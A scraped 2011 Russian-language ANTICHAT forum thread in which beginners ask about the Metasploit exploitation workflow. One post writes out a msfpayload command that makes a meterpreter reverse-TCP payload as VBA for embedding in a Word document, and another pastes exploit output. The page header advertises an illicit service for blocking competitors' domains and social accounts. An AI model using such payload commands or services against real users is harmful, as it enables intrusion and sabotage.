УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Вопрос по Metasploit 3.5.1

Опции темы

Поиск в этой теме

Опции просмотра

31.03.2011, 11:18

Юдат

Guest

Сообщений: n/a

Провел на форуме:
1457

Репутация: 0

Доброго всем времени суток!

В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:

никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?

Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?

З.Ы. в манах ничего не нашел =(

И хотел бы уточнить, правильно ли я понимаю порядок действий?

1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий

2. находение сплоита отвечающего требованиям найденного, и конечной цели

3. использование сплоита с начинкой.

Зарание спасибо.

02.04.2011, 18:54

neofit

Новичок

Регистрация: 14.11.2009

Сообщений: 5

Провел на форуме:
52725

Репутация: 0

Отправить сообщение для neofit с помощью ICQ

Цитата:

Сообщение от Юдат

Юдат said:
Доброго всем времени суток!
В процессе изучения Metasploit'a 3.5.1 (версия из BackTrack'a 4r2) сталкнулся с проблемой:
никак не могу найти есть ли поиск уязвимости и сплоита к ней по сервису слушающему конкретный порт на цели проникновения?
Или нужно досканально знать какой сплоит какую уязвимую версию сервиса юзает?
З.Ы. в манах ничего не нашел =(
И хотел бы уточнить, правильно ли я понимаю порядок действий?
1. сканирование цели на нахождение открытых портов, определения ОСи, сервисов, и версий
2. находение сплоита отвечающего требованиям найденного, и конечной цели
3. использование сплоита с начинкой.
Зарание спасибо.

Приветствую всё правелоно только целевая тачка должна быть с тобою в одной сети или прямой IP с обеех старон.

Ну и автоподбор эксплойта рекомендую fast-track.

05.04.2011, 00:49

dupD0M

Новичок

Регистрация: 18.05.2010

Сообщений: 17

Провел на форуме:
98141

Репутация: 0

Отправить сообщение для dupD0M с помощью ICQ

ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))

????

05.04.2011, 06:06

neofit

Новичок

Регистрация: 14.11.2009

Сообщений: 5

Провел на форуме:
52725

Репутация: 0

Цитата:

Сообщение от dupD0M

dupD0M said:
ХМ....вот как бы кто то пробовал сплоин в backtrack который через адоб ПДФ открывает ключик в домик Ю_зверька???а то потренироватся не как просто не могу найти второй комп....а не кто не соглашается))
????

С другом твоим в локалке)))

05.04.2011, 16:24

pahom

Guest

Сообщений: n/a

Провел на форуме:
1000

Репутация: 0

Здравствуйте. у меня такая проблемка

прописываю msfpayload windows/meterpreter/reverse_tcp LHOST=ip LPORT=port V > test.bas

после это создаю вордовский документ .doc вставляю туда test.bas через visual basic и когда нажимаю сохранить выводит ошибку "сбой сохранения из-за недостатка памяти или места на диске"

места на диске 30 гб

подскажите в чем проблема?

спасибо.

15.04.2011, 10:01

Oro4imaru

Guest

Сообщений: n/a

Провел на форуме:
4616

Репутация: 0

после запуска сплоита получаю вот такой ответ
[*] Started reverse double handler
[*] Sending Backdoor Command

[-] Not backdoored
[*] Exploit completed, but no session was created.

это значит что просто не удалось создать обратную связь (плохая начинка)? или что эксплойт не сработал?